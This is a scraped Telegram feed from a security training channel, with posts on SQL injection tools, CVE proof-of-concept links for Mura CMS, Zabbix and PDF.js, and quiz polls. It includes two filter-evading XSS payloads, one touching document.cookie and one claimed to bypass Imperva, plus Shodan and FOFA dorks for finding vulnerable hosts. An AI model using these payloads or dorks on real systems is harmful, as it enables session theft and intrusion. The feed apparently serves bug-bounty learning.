Brut Security
15.6K subscribers
1.03K photos
83 videos
295 files
1.09K links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: info@brutsec.com
Download Telegram
2FA Bypass.pdf
301.4 KB
πŸ‘1
demo.gif
10.9 MB
🚨SQLMC - SQL Injection Massive Checker🚨

πŸ“’SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.

πŸ”—Download https://github.com/malvads/sqlmc
πŸ‘8
SSRF.pdf
212.7 KB
πŸ‘4
Brut Security pinned Β«Keep checking my old Posts to continue your learning Process!Β»
Brut Security pinned Deleted message
Bypass XSS Filter with Array

Payload :
<noscript><p title="</noscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>">
πŸ‘6
A ____ is used to connect to a remote system using NetBIOS.
Final Results
46%
NULL session
13%
Hash
10%
Rainbow table
41%
Rootkit
πŸ‘1
Brut Security
A ____ is used to connect to a remote system using NetBIOS.
Answer is NULL Session
πŸ‘5😐2
🚨Muraider - Automating the detection & Exploitation of CVE-2024-32640 SQLi in Mura/Masa CMS🚨

⚠Usage- python3 CVE-2024-32640.py --url https://target.com

πŸ‘‰Dorks-
Shodan-query: 'Generator: Masa CMS'
Google: "powered by Mura CMS"
FOFA: app="Mura-CMS"

πŸ”—Link- https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS

πŸ‘‰References:
https://buff.ly/3WKUzc9
https://buff.ly/3WJh1SY

πŸ“’For Live Class Enrollment DM in Whatsapp- https://buff.ly/3wOME2W
πŸ“Join Our Telegram- https://buff.ly/3yi0H1o
πŸ“Join Our Community- https://zurl.co/6G4I
πŸ‘3πŸ”₯2
πŸ“’ Take the 30-Day Bug Hunting Challenge!

🚨 Get ready to put your skills to the test! The challenge will be starting from June 1st.

πŸ‘‰ Anyone can participate in the challenge by joining our community. This is a self-help goal challenge where you will need to dedicate yourself for 30 days until you successfully find a bug and report it.

πŸ”— Join the Brut Security Community on Nas.io now: https://nas.io/brutsecurity

πŸ“ For Enquiries DM us in WhatsApp: https://wa.me/918945971332
πŸ‘Ž2
🚨GraphQL Test Cases Checklist🚨

πŸ”—Link- https://anmolksachan.github.io/graphql/
πŸ‘6πŸ”₯4
🚨CVE-2024-22120: Zabbix SQLi Vulnerability🚨

⚠POC: https://lnkd.in/gtbSbpvg
⚠POC: https://lnkd.in/gv5t27Vw

πŸ‘‰This time-based SQL injection flaw poses a significant risk to systems running affected Zabbix, potentially allowing attackers to escalate privileges and even achieve remote code execution (RCE).

πŸ“’Reference: https://lnkd.in/g3iSTYEy

πŸ“Dorks:
Hunter:/product.name="Zabbix"
FOFA:app="ZABBIX-Monitoring"
SHODAN:http.component:"Zabbix"
πŸ‘3πŸ”₯2
🚨CVE-2024-4367 & CVE-2024-34342: Arbitrary JavaScript execution in PDF.js



πŸ‘‰A type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context. This vulnerability affects Firefox < 126, Firefox ESR < 115.11, and Thunderbird < 115.11.

If pdf.js is used to load a malicious PDF, and PDF.js is configured with isEvalSupported set to true (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain.



πŸ“’POC: https://www.youtube.com/watch?v=c90_UKJvj_w

πŸ“’POC: https://github.com/LOURC0D3/CVE-2024-4367-PoC
πŸ”₯3πŸ‘2
What are the Cybersecurity Risks of Mobile Banking Apps?
Anonymous Poll
19%
Malware
36%
App Vulnerabilities
29%
Phishing Attacks
16%
Man-in-the-Middle Attacks
This XSS Payload bypasses Imperva's Protection.

<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061;lert&#x000000028;origin&#x000029;>
πŸ‘9